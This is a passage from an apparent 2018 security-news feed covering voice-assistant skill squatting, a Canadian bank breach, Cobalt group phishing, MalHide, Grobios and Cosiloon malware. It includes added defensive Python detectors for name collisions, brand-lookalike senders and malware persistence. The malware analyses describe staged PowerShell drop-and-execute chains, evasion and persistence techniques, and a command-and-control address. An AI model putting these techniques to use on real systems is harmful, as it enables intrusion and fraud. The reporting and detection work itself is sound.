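One place to catch this is the skill store itself, at registration time. As an added example (not code from the researchers or from Amazon or Google), the following Python checks a proposed invocation name against the names already registered and flags the three collision types the paper describes: a homophone (“Capital Won”), an existing name padded with filler words (“Capital One please”, “Capital One Police”), and a near-identical spelling. The homophone table is a constructed stand-in for illustration; a real check would derive pronunciations from a dictionary such as CMUdict, and “police” is mapped to “please” only because the paper reports that the recognizer treats them as interchangeable.

```python
import difflib
import re

# Constructed, deliberately small homophone table for illustration only; a real
# review pipeline would derive pronunciations from a dictionary such as CMUdict.
# "police" -> "please" mirrors the paper's observation that the assistant does
# not distinguish the two.
HOMOPHONES = {
    "won": "one", "1": "one",
    "too": "two", "to": "two", "2": "two",
    "for": "four", "4": "four",
    "police": "please",
}

# Words the assistant tolerates around an invocation name ("Capital One please").
FILLER = {"please", "now", "skill", "app", "the"}


def normalize(name):
    """Lower-case, tokenize and collapse homophones so that names that sound
    alike compare equal."""
    words = re.findall(r"[a-z0-9]+", name.lower())
    return [HOMOPHONES.get(w, w) for w in words]


def classify(candidate, registered, threshold=0.85):
    """Compare a proposed invocation name against registered ones.

    Returns (kind, existing_name) for the first collision found, or None:
      "duplicate"  - the same name is already registered
      "homophone"  - spelled differently but normalizes to the same words
      "paraphrase" - an existing name followed only by filler words
      "similar"    - near-identical spelling (typo-squat) above `threshold`
    """
    cand = normalize(candidate)
    for existing in registered:
        reg = normalize(existing)
        if cand == reg:
            kind = "duplicate" if candidate.lower() == existing.lower() else "homophone"
            return (kind, existing)
        if (len(cand) > len(reg) and cand[:len(reg)] == reg
                and set(cand[len(reg):]) <= FILLER):
            return ("paraphrase", existing)
        ratio = difflib.SequenceMatcher(None, " ".join(cand), " ".join(reg)).ratio()
        if ratio >= threshold:
            return ("similar", existing)
    return None


if __name__ == "__main__":
    registry = ["Capital One", "Weather"]
    for proposed in ["Capital Won", "Capital One please", "Capital One Police",
                     "Capitol One", "Traffic"]:
        print(f"{proposed!r}: {classify(proposed, registry)}")
```

The string-similarity pass is a coarse backstop for spelling-level squats; it is the phonetic normalization that catches the cases the paper is about, which is why a production check should replace the toy table with real pronunciations rather than raise the similarity threshold.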
Voice masquerading, on the other hand, is a method wherein a malicious skill impersonates a legitimate one to either trick users into giving out their personal information and account credentials or eavesdrop on conversations without user awareness.

Researchers identified two ways this attack can be made: in-communication skill switch and faking termination. The former takes advantage of the false assumption that smart assistants readily switch from one skill to another once users invoke a new one. Going back to our previous example, if Capital Won is already running and the user decides to ask “Alexa, what’ll the weather be like today?”, Capital Won then pretends to hand over control to the Weather skill in response to the invocation when, in fact, it is still Capital Won running but this time impersonating the Weather skill.

As for the latter, faking termination abuses voluntary skill termination, a feature wherein a skill can end itself after delivering a voice response such as “Goodbye!” to the user. A malicious skill can be programmed to say “Goodbye!” but remain running and listening in the background for a given length of time.

But…I like my smart assistant!

No need to box up your smart speakers and send them back if these vulnerabilities worry you. But it is essential for users to really get to know how their voice assistant works. We believe that doing so can make a significant difference in maintaining one’s privacy and protecting from attack.

“Making devices, such as Alexa, responsible for important systems and controls around the house is concerning, especially when evidence emerges that it’s able to turn a simple mistake into a potentially serious consequence,” our very own Malware Intelligence Analyst Chris Boyd said in an interview with Forbes.

Smart assistants and IoT, in general, are still fairly new tech, so we expect improvements in the AI, and the security and privacy efforts within this sector. Both Amazon and Google have claimed they already have protections against voice squatting and voice masquerading.

While it is true that the researchers had already met with both firms to help them understand these threats further and offer them mitigating steps, they remain skeptical about whether the protections put in place are indeed adequate. Only time will tell.

The post Researchers discover vulnerabilities in smart assistants’ voice commands appeared first on Malwarebytes Labs.

Two major Canadian banks hacked and blackmailed

While the US was celebrating Memorial Day on Monday, Canada was dealing with an unusual and major data breach affecting two popular financial institutions: Simplii Financial and the Bank of Montreal (BMO).

The CBC broke the story and updated it throughout the day to mention that at least 90,000 customers were affected by this attack which the banks say they became aware of on Sunday, just one day prior.

While at first the details were scarce, the CBC later confirmed that the perpetrators had threatened to release their data trove publicly unless the banks agreed to pay them a 1 million dollar ransom on May 28th, just before midnight.

BMO has said that they did not pay the ransom and instead is focusing on helping and protecting its customers. Both banks are offering support and in particular credit monitoring services to the victims of this incident.

This hack is noteworthy for targeting two major Canadian financial institutions at the same time and exposing extremely sensitive personal information which, unlike a password, cannot be changed. Although the data has now lost some of its immediate value, the attackers may decide to dump all the information publicly or sell it to the highest bidder.

Breaches leave users scared and frustrated because they know their data may be stolen in a way that is out of their own control. Having said that, certain measures can contain the damage and are easy to apply. For one, using strong and unique passwords is absolutely critical, so that a password exposed in one breach cannot be used to compromise your other accounts.

Many online services use security questions as part of the authentication process, and these are problematic in themselves: the honest answers (your favourite colour, your mother’s maiden name) are exactly the kind of personal detail a breach like this one exposes. Rather than answering “blue” to the question about your favourite colour, treat the answer as a second password: use a full sentence, or something that has nothing to do with colours at all, and keep it in your password manager. Finally, whenever possible, enable two-factor authentication, as it provides an additional layer of security over the otherwise weak password-only approach.

The post Two major Canadian banks hacked and blackmailed appeared first on Malwarebytes Labs.

BackSwap Trojan exploits standard browser features to empty bank accounts

Creating effective and stealthy banking malware is becoming increasingly difficult, forcing malware authors to come up with innovative methods. The latest creative burst in this malware segment comes from a group that initially came up with malware stealing cryptocurrency by replacing wallet addresses in the clipboard. About the BackSwap banking malware “To steal money from a victim’s account via the internet banking interface, typical banking malware will inject itself or its specialized banking module into … More

The post BackSwap Trojan exploits standard browser features to empty bank accounts appeared first on Help Net Security.

The Cobalt Hacking crew is still active even after the arrest of its leader

Group-IB has released a new report on Cobalt group’s attacks against banks and financial sector organizations worldwide after the arrest of its leader.

Threat intelligence firm Group-IB published an interesting report titled “Cobalt: Evolution and Joint Operations” on the joint operations of the Cobalt and Anunak (Carbanak) groups after the arrest of Cobalt’s leader in March 2018.

Researchers reported that the most recent campaign associated with Cobalt group is dated May 23, 2018 and aimed at banks in Russia and CIS countries.

The analysis of the content of the spear-phishing messages suggests the attackers are also targeting western financial organizations.

Interestingly, the spear-phishing messages sent by the hackers were disguised as fake Kaspersky security alerts.

“The first wave of the phishing campaign was tracked on May 23 at 13:21 Moscow time. For the first time in Cobalt’s practice, phishing emails were sent acting as a major anti-virus vendor.” reads the press release issued by Group-IB.

“The user received a “complaint” in English that activity was recorded from their computer that violated existing legislation. The recipient was asked to read the attached letter and provide detailed explanations. If the response was not received within 48 hours, the “anti-virus company” threatened to impose sanctions on the recipient’s web resources. In order to download the letter, the user was asked to follow the link, which would then infect the Bank employee’s computer.”

Cobalt attack

Group-IB attributed the attack to Cobalt because of the involvement of the CobInt Trojan, malware observed exclusively in campaigns of this threat actor.

The phishing emails were sent from the domain “kaspersky-corporate.com”, which was registered by the same person who registered other domains used by the Cobalt group in its campaigns.

Experts highlighted the high quality of the phishing messages: the text is in perfect English and styled as a “legal complaint”, and the fake website kaspersky-corporate.com is also of high quality. This quality suggests a possible collaboration between Cobalt and other criminal gangs such as Anunak.
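The lure relied on a brand name embedded in a domain the brand does not own, which is something a mail gateway can check mechanically. As an added example (not code from Group-IB or from Security Affairs), the following Python flags a From: header that trades on a known vendor name without coming from that vendor’s real domain; it catches both a brand word inside the sending domain (kaspersky-corporate.com) and a brand used only in the display name in front of an unrelated address. The allow-list of legitimate domains and the sample headers are constructed for illustration; a deployment would populate the list from the vendor’s published sending domains and SPF record, and use the Public Suffix List instead of the two-label heuristic below.

```python
from email.utils import parseaddr

# Constructed allow-list for illustration; in practice, populate it from each
# vendor's published sending domains and cross-check against its SPF record.
KNOWN_BRANDS = {
    "kaspersky": {"kaspersky.com"},
    "malwarebytes": {"malwarebytes.com"},
}


def registrable_domain(host):
    """Crude last-two-labels heuristic; a production filter should use the
    Public Suffix List so that e.g. 'example.co.uk' is handled correctly."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def brand_lookalike(from_header):
    """Return (brand, domain) if the From: header trades on a known brand name
    without coming from that brand's real domain, else None.

    Two tricks are covered: a brand word embedded in the sending domain
    (kaspersky-corporate.com, with hyphens ignored) and a brand name used only
    in the display name with an unrelated address behind it."""
    display, addr = parseaddr(from_header)
    host = addr.rpartition("@")[2]
    if not host:
        return None
    domain = registrable_domain(host)
    haystack = domain.replace("-", "") + " " + display.lower()
    for brand, legit in KNOWN_BRANDS.items():
        if brand in haystack and domain not in legit:
            return (brand, domain)
    return None


# Constructed sample headers (not real messages).
SAMPLE_FROM_HEADERS = [
    "Kaspersky Legal <complaints@kaspersky-corporate.com>",
    "Kaspersky Lab <noreply@mail.kaspersky.com>",
    "Security Team <alerts@example.org>",
    "Kaspersky Support <help@cdn-notify.example>",
]


def scan(headers=SAMPLE_FROM_HEADERS):
    """Return the subset of headers that look like brand impersonation."""
    return [h for h in headers if brand_lookalike(h)]


if __name__ == "__main__":
    for header in scan():
        print("suspicious:", header, brand_lookalike(header))
```

A plain substring match will also hit legitimate third parties that carry a vendor’s name (resellers, regional partners), so in practice the result should feed a quarantine or review queue rather than an outright block, and the allow-list should grow as such senders are verified.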

The report also analyzes the group’s past attacks on the SWIFT system; the researchers concluded that the advanced understanding of banking technology and the money-laundering capabilities on display were the result of collaboration with other threat actors.

“Following the 2016 SWIFT incidents, attacks involving interbank transfer systems ceased and Cobalt switched focus to other critical systems in banks such as ATMs. This was followed by Card Processing attacks which provide a safer withdraw process for Money Mules.” continues the report.

“Cobalt’s first major attack was against First Bank in Taiwan where attackers managed to steal over $2 million dollars. Following this, Cobalt was then successful in targeting the card processing systems at a bank in Kazakhstan taking over two months to prepare their attack and successfully steal $600,000 through card processing. These attacks were then perfected and intensified in 2017 across tens of incidents.”

The Cobalt group has also conducted “supply chain” attacks, such as the one carried out in February 2017 against a system integrator in order to later hit organizations in Russia and former CIS countries. In 2017 Cobalt infiltrated at least four other system integrators.

Cobalt’s attacks also hit non-typical targets like the one that in March 2017 hit a company providing electronic wallets and payment terminals.

The Cobalt group has continually modified its tools over the years; it also used a modified version of the Petya ransomware to wipe evidence of an intrusion after a failed attempt to steal from a bank’s ATM systems.

“Cobalt is still active: its members continue attacks on financial organizations and other companies worldwide,” comments Dmitry Volkov, Group-IB CTO. “We have technical proof of collaboration between Cobalt and Carbanak. In order to enable business and market regulators to take preventative measures against these criminals, we provide our customers indicators to protect them from phishing, identify the infrastructure and methods still used by these criminals.”

Pierluigi Paganini

(Security Affairs – hacking, cybercrime)

The post The Cobalt Hacking crew is still active even after the arrest of its leader appeared first on Security Affairs.

Security Affairs: MalHide Malware uses the compromised system as an eMail relay

The cybersecurity expert Marco Ramilli analyzed a new malware sample, dubbed MalHide, that implements a fairly new attack path: the compromised system is used as an email relay in order to hide the attacker's networks.

Today I’d like to share an interesting (at least to me) analysis of a given sample. I have called this sample MalHide, but you will see why only at the end of my post :D. I believe this is a quite interesting malware because, first, it implements several obfuscation stages using different obfuscation techniques and, second, it implements a quite new attack path (not new per se, but new for opportunistic malware families) where the attacker doesn’t want to steal information and/or compromise a system for possession and/or destruction; instead, the attacker uses the compromised system as an email relay in order to hide the attacker's networks. It is striking to find that attackers are primarily moving in the direction of fraud. For example, having obtained privileged access on the victim machine, the attacker might decide to perform several malicious actions, but among all the choices, he decides to spawn an SMTP relay to anonymously send fraud emails. Based on my past experience this is quite weird, isn’t it?!
Disclaimer: I’m not going into details on every step since I’m not writing a tutorial; mostly I’d like to show that threats are getting more and more complex in a relatively short time and that this attack path is quite unique, at least in my personal experience.
Everything started with an email attachment named “Nuovo Documento.doc”, which was able to bypass every single anti-spam and anti-malware engine the target had. The following image shows the initial stage, where the “.DOC” file appears to be benign but not compatible with the running Microsoft Word instance.
MalHide Sample as it looks like on opening. Stage 1
The sample contains some macro functions. Many junk functions have been injected on the VBA side in order to make life harder for reverse engineers, but fortunately the Microsoft VBA Editor included in the Microsoft Office suite provides a useful debugger. The analyst observes that the AutoOpen() function is preserved and filled with code. It took almost 3 seconds to figure out that it was malicious code. The following image shows the Microsoft VBA Editor debugging view, where it is possible to see the variable qZbTUw containing encoded PowerShell code. Here we are! The second stage is approaching the victim.
Stage 2. A running instance of PowerShell invoked by VBA
The PowerShell code was Base64 encoded and additionally obfuscated through “variable mess”. This technique is quite common among JavaScript developers, since the code they develop runs client-side and obfuscation is a technique used to protect (sort of) the written code; but in the given scenario it looks like a simple implementation of fileless staging, where the attacker runs a PowerShell script directly from memory without saving it to disk. In this way the victim does not need to have the “run PowerShell from file” Microsoft registry key enabled, and it’s much harder for an antivirus to detect the infection stage. The script then fires it off, continuing the infection. PowerShell ISE helps us reverse the dropped payload. The following images show the decoding process: from the single line of obfuscated code to the dropping URLs. I know, it’s almost impossible to see the images since they look small, but please click on them for a bigger view, if you wish.
Stage 3. Decoding Powershell Drop-and-Execute
Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to the IoC section)! The executed actions are quite standard: from an array of dropping websites, cycle over them and take the one that drops! The cycling policy could differ from sample to sample, since they could use a pseudo-random seed generator, an increment rotation, a round-robin rotation and so on. For this analysis the cycling policy is not interesting at all, since we decoded all the possible dropping files. The PowerShell command gets 52887.exe from an external source (the dropping websites), places it at C:\Users\Public\52887.exe and finally runs it. Stage 4 has begun: a new PE sample has been executed. The following image shows Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately, this stage drops the code from itself without going out on the network. fonduewwa.exe is then executed.
Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe
The new stage (Stage 4) performs the following steps:
1) It fires up services which act as an SMTP client.
2) It connects to a Command and Control server which provides email addresses, SMTP relays, and the email bodies to be sent.
3) It sends emails to carry out BEC (Business Email Compromise) communications.
The following images show the Command and Control address. The first image shows the Windows API used, while the second one shows the connections opened directly on the infected machine.
Command and Control IP Address (click to make it bigger)
Command and Control DNS resolution (click to make it bigger)
The Command and Control (C2) listens at c-67-176-238-209.hsd1.il.comcast.net, which today resolves to 67.176.238.209. The C2 seems to answer HTTP queries carrying a specific set of cookies, as the following image shows. The crafted and rebuilt C2 communication, made possible by reconstructing the cookies from sniffed internal communications, gets back a kB of encoded data from the C2.
Command and Control Communication through HTTP

From the C2 come actions, victim addresses, SMTP servers, and passwords. The sample connects to the given SMTP relays, authenticates itself and sends email to the victims. The following images prove that the attackers have plenty of credentials for SMTP relays around the globe.

MalHide Connection to real SMTP relays
For now I will not disclose the usernames and passwords used to access the SMTP relays, but if you can prove to be the owner of one of them (or at least to be working for the company that owns it), let’s have a chat about it: many interesting things are happening in your network. The emails sent from the analyzed sample target specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BEC (or CEO scam) against specific targets. For those of you not familiar with this attack, I am copying the definition provided by SANS (here).
“Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT. Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive.
These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone.”

Following are a few examples of the sent emails coming from the C2 and delivered through the analyzed MalHide sample.

Here we are: another email has been sent, another malware has been conceived and developed, another analysis I have made, but this time it looks like the “malware economy” is seriously moving toward fraud; there is much more money in it than in information stealing, which is an ancient and romantic way to attack victims. Is this attack a significant example expressing the will of the new underground economy? Is this attack a small and silent change of paradigm, where previously the attacker was interested in your data in order to sell it, but now he is more interested in defrauding third parties (such as companies) through you? I do not have an answer here.

Ok, now it’s time to explain why I called this malware MalHide. Well, it’s a complex malware, it hides several times, BUT most importantly it has been developed to hide the attacker when sending emails, in a way that makes it impossible to trace the attacker's IP back from the attack path. So I believe MalHide is a nice name 😀

Further details on the MalHide malware, including the IoCs, are reported in the original analysis published by Marco Ramilli:

https://marcoramilli.blogspot.it/2018/05/malhide-interesting-malware-sample.html

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research on malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system for the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to broaden my cyber security experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MalHide, malware)

The post MalHide Malware uses the compromised system as an eMail relay appeared first on Security Affairs.


Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan

Security experts have highlighted several times the decline in exploit kit activity after the disappearance of the Angler and Nuclear exploit kits in 2016.

Nevertheless, researchers at FireEye periodically observe significant developments in this space, and they recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK).

The RIG Exploit Kit has recently been involved in the distribution of the Grobios Trojan; the infection chain is shown in the following image.

RIG Exploit Kit Grobios campaign

“We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it,” reads the analysis published by FireEye.

“The iframe loads a malvertisement domain, which communicates over SSL and leads to the RIG EK landing page that loads the malicious Flash file”. “When opened, the Flash file drops the Grobios Trojan.”

Malware researchers said the Grobios Trojan implements several evasion techniques and uses various persistence mechanisms to make it hard for victims to uninstall the threat. The malware uses the following techniques to gain persistence:

  • It drops a copy of itself into the %APPDATA% folder (e.g. %APPDATA%\Google\v2.1.13554\<RandomName>.exe), masquerading as a version of a legitimate application installed on the target system. It creates an Autorun registry key and a shortcut in the Windows Startup folder.
  • It drops multiple copies of itself in subfolders of a program under %ProgramFiles%/%PROGRAMFILES(X86)%, masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy of itself in the %Temp% folder and creates a scheduled task to run it.

The malware also uses multiple anti-debugging, anti-analysis and anti-VM techniques to evade detection.

Once it has completed a series of checks to detect VMs and malware analysis environments, the Grobios Trojan connects to the command and control (C2) server to receive commands.

“In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx,” continues the analysis.

“The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash. The malware also uses stack strings.”

Once it has infected the system, the malware also creates two scheduled tasks.

Experts highlighted that the malware protects its copy in the %TEMP% folder with EFS (Windows Encrypting File System).

The analysis of the code also revealed the presence of two hardcoded obfuscated C2s.
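The persistence behaviour described above (copies under %APPDATA%, Program Files and %TEMP%, Autorun keys, Startup shortcuts, scheduled tasks, and the EFS-protected copy) can be turned into a host triage rule: a legitimate product is normally registered once from its own install directory, whereas here one binary is persisted from several places at once. The following is an added example, not FireEye's code or tooling: it scores a constructed inventory of persistence entries and flags the binary that matches that pattern. Hashes, file names, task names and the environment map are constructed placeholders, not indicators from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed environment so the example runs offline; on a live host read os.environ.
ENV = {
    "APPDATA": r"C:\Users\alice\AppData\Roaming",
    "TEMP": r"C:\Users\alice\AppData\Local\Temp",
    "PROGRAMFILES": r"C:\Program Files",
    "PROGRAMFILES(X86)": r"C:\Program Files (x86)",
}
USER_WRITABLE = ("APPDATA", "TEMP")
VERSION_DIR = re.compile(r"^v?\d+(\.\d+)+$", re.I)   # e.g. v2.1.13554
WEIGHTS = {
    "multiple-copies": 3,       # same bytes registered from several directories
    "multiple-mechanisms": 1,   # Run key + Startup shortcut + scheduled task
    "efs-encrypted": 2,         # image protected with EFS, as the %TEMP% copy is
    "user-writable-dir": 2,     # lives under %APPDATA% or %TEMP%
    "version-like-dir": 1,      # masquerades as "<Product>\v1.2.3\"
}


@dataclass
class PersistenceEntry:
    source: str                  # "run_key", "startup_lnk" or "scheduled_task"
    name: str                    # value name, shortcut name or task name
    image: str                   # target path as recorded, may contain %VARS%
    sha256: str                  # hash of the file on disk (placeholders below)
    efs_encrypted: bool = False  # FILE_ATTRIBUTE_ENCRYPTED set on the image


def expand(path: str) -> str:
    """Expand %VAR% references using the constructed ENV map."""
    return re.sub(r"%([^%]+)%", lambda m: ENV.get(m.group(1).upper(), m.group(0)), path)


def location_signals(image: str) -> set:
    """Tags derived from where the image lives, independent of other entries."""
    full = expand(image).lower()
    tags = set()
    if any(full.startswith(ENV[v].lower() + "\\") for v in USER_WRITABLE):
        tags.add("user-writable-dir")
    if any(VERSION_DIR.match(part) for part in full.split("\\")[:-1]):
        tags.add("version-like-dir")
    return tags


def triage(entries, threshold: int = 4) -> dict:
    """Group persistence entries by file hash and score each distinct binary.
    Returns {sha256: {"score", "signals", "entries"}} for binaries at or above
    the threshold; the multiple-copies signal is the one a product install lacks."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e.sha256].append(e)
    findings = {}
    for digest, group in by_hash.items():
        tags = set()
        dirs = {expand(e.image).lower().rsplit("\\", 1)[0] for e in group}
        if len(dirs) >= 2:
            tags.add("multiple-copies")
        if len({e.source for e in group}) >= 2:
            tags.add("multiple-mechanisms")
        if any(e.efs_encrypted for e in group):
            tags.add("efs-encrypted")
        for e in group:
            tags |= location_signals(e.image)
        score = sum(WEIGHTS[t] for t in tags)
        if score >= threshold:
            findings[digest] = {"score": score, "signals": sorted(tags),
                                "entries": [f"{e.source}:{e.name}" for e in group]}
    return findings


# Constructed inventory (hashes are placeholders, not real indicators): one binary
# planted the way the report describes, plus two ordinary product entries.
SAMPLE_ENTRIES = [
    PersistenceEntry("run_key", "GoogleUpdate", r"%APPDATA%\Google\v2.1.13554\kqzr.exe", "HASH-A"),
    PersistenceEntry("startup_lnk", "GoogleUpdate.lnk", r"%APPDATA%\Google\v2.1.13554\kqzr.exe", "HASH-A"),
    PersistenceEntry("scheduled_task", "ExampleApp Update", r"%PROGRAMFILES(X86)%\ExampleApp\v3.1.0\kqzr.exe", "HASH-A"),
    PersistenceEntry("scheduled_task", "TempMaintenance", r"%TEMP%\kqzr.exe", "HASH-A", efs_encrypted=True),
    PersistenceEntry("run_key", "ExampleApp", r"%PROGRAMFILES%\ExampleApp\ExampleApp.exe", "HASH-B"),
    PersistenceEntry("scheduled_task", "ExampleApp Updater", r"%PROGRAMFILES%\ExampleApp\Updater.exe", "HASH-C"),
]

if __name__ == "__main__":
    for digest, finding in triage(SAMPLE_ENTRIES).items():
        print(digest, finding["score"], finding["signals"], finding["entries"])
```

On a real host the inventory would be collected from the Run keys, the Startup folders and the Task Scheduler, with the hash and the encrypted attribute read from each target file.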

“Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.” concluded FireEye.

Further details including the IoCs for the threat are available in the report.

Pierluigi Paganini

(Security Affairs – RIG Exploit Kit , Grobios Trojan)

The post Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan appeared first on Security Affairs.


Security Affairs: Security Affairs newsletter Round 164 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

  • Experts propose a new variation of the Spectre attack to recover data from System Management Mode
  • Misconfigured CalAmp server allowed hacker to take over a lot of vehicles
  • Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
  • Hacked Drupal sites involved in mining campaigns, RAT distribution, scams
  • Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
  • Judges convict crook of operating Scan4You Counter Antivirus Service
  • Roaming Mantis gang evolves and broadens its operations
  • North Korea-linked Sun Team APT group targets defectors with Android Malware
  • Tech giants are all working on new Spectre and Meltdown attacks, so-called variant 3 and variant 4
  • The ZipperDown Vulnerability could affect roughly 10% of iOS Apps
  • TheMoon botnet is now leveraging a zero-day to target GPON routers
  • Chinese researchers from Tencent discovered exploitable flaws in several BMW models
  • Experts warn: it is too easy to steal WiFi access key from TalkTalk's Super Routers
  • Huge Russia-Linked botnet VPNFilter ready to launch a massive attack on Ukraine
  • Turla APT group leverages for the first time the Metasploit framework for the Mosquito campaign
  • Bitcoin Gold hit by double-spend attack, exchanges lose over $18 million
  • Justice Department announces actions to disrupt the VPNFilter botnet
  • Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
  • Many users reported in the past few weeks their Macs have been infected with a new Monero Miner
  • Xenotime, Threat actors Behind Triton Malware broadens its activities
  • Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
  • More than 100 Million IoT devices potentially exposed to Z-Shave Z-Wave attack
  • Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware
  • CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
  • Experts show how to defeat AMD's Secure Encrypted Virtualization
  • Pre-installed malware found in 141 low-cost Android devices in over 90 countries

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 164 – News of the week appeared first on Security Affairs.




Pre-installed malware found in 141 low-cost Android devices in over 90 countries

Researchers from the antivirus firm Avast are investigating the discovery of pre-installed malware found in 141 low-cost Android devices in over 90 countries.

Security experts from the antivirus firm Avast have discovered a new case of pre-installed malware on low-cost Android devices: crooks injected the malicious code into the firmware of 141 models.

The operation is linked to the discovery made in December 2016 by researchers at antivirus firm Dr. Web, when the experts reported a crime gang that had compromised the supply-chain of several mobile carriers, infecting mobile devices with malware.

In 2016, the malware infected the firmware of at least 26 low-cost Android smartphone and tablet models. The firmware of a large number of popular Android devices built on the MediaTek platform was compromised with at least two types of downloader Trojans.

Both malware strains found on the low-cost Android mobile devices, detected as Android.DownLoader.473.origin and Android.Sprovider.7, were able to collect users’ data, display advertisements on top of running applications and download unwanted apps. These low-cost Android smartphones and tablets were mostly marketed in Russia.

Today, Avast experts believe the same criminal gang is still active and is continuing the same operation, compromising the firmware of many other devices by injecting a malware strain dubbed Cosiloon.

The researchers discovered infected devices in over 90 countries, and all of them use a MediaTek chipset, but MediaTek is not the root cause of the infections, because only the firmware of some devices of an affected smartphone model is tainted with malware. This means that the attackers did not compromise the MediaTek firmware components.

“The adware we analyzed has previously been described by Dr. Web and goes by the name “Cosiloon.” As can be seen in the screenshots below, the adware creates an overlay to display an ad over a webpage within the users’ browser. The adware has been active for at least three years, and is difficult to remove as it is installed on the firmware level and uses strong obfuscation.” reads the analysis published by Avast.

“Thousands of users are affected, and in the past month alone we have seen the latest version of the adware on around 18,000 devices belonging to Avast users located in more than 100 countries including Russia, Italy, Germany, the UK, as well as some users in the U.S.”

Avast published a list of over 140 Android smartphones and tablets on which it says it found the group’s malware, which the company calls Cosiloon.

The Cosiloon malware is the same that was spotted in 2015 by Dr. Web and according to the experts it hasn’t received any updates.

The malware is composed of two separate APKs, the dropper and the payload. In the older versions of the malware, the experts noticed a separate adware app pre-installed in the /system partition; in the most recent variants the researchers found a newly dropped payload.

“A second variant of the dropper is a bit more interesting. The code is pretty much the same as the first variant, but it is not a separate system application. The code is embedded in SystemUI.apk, an integral part of the Android OS. This makes the dropper pretty much impossible to remove by the user.” continues the analysis.

The dropper runs from the /system folder with full root privileges; it downloads an XML file from a remote server and then installs other malicious apps.

In almost every infection, the malicious code was used to display ads on top of mobile apps or the Android OS interface.

Cosiloon pre-installed malware

The experts noticed that the pre-installed malware doesn’t drop any malicious app if the device language is set to Chinese, if the device’s public IP address is in a Chinese IP range, or if fewer than three apps are installed (a circumstance that could indicate that the malware is running in a test environment).

Avast researchers confirmed that the infection point is still a mystery due to the large number of vendors involved, and that detecting the dropper is very complicated, as explained in the analysis.

“Detecting the dropper is further complicated by the fact that it is a system app, part of the devices’ read-only firmware, which is integrated in the device shipped from the factory.” continues the analysis.

“Also, it is likely odexed in most firmwares, meaning the app’s code was removed from the original APK file, optimized and stored separately during the firmware’s build process. As a result, cybersecurity firms are likely missing many of the dropper samples and have to rely on the payload for detection and statistics.”

Experts believe the attackers are opportunistic and target the supply chain more or less at random, whenever they have the opportunity to compromise a vendor’s firmware.

The control server was up until April 2018; the crooks produced new payloads over time while new devices were shipped by several manufacturers with the pre-installed dropper.

The experts have attempted to disable Cosiloon’s C&C server by sending takedown requests to the domain registrar and server providers. The ZenLayer provider quickly shut down the server, but the crooks moved their activities to another provider that did not respond to Avast’s request.

“Avast Mobile Security can detect and uninstall the payload, but it cannot acquire the permissions required to disable the dropper, so Google Play Protect has to do the heavy lifting.” concluded Avast.

“If your device is infected, it should automatically disable both the dropper and the payload. We know this works because we have observed a drop in the number of devices infected by new payload versions after Play Protect started detecting Cosiloon.”

Further details, including IoCs for the Cosiloon pre-installed malware, are reported in the Avast analysis.

Pierluigi Paganini

(Security Affairs – pre-installed malware, Cosiloon malware)

The post Pre-installed malware found in 141 low-cost Android devices in over 90 countries appeared first on Security Affairs.


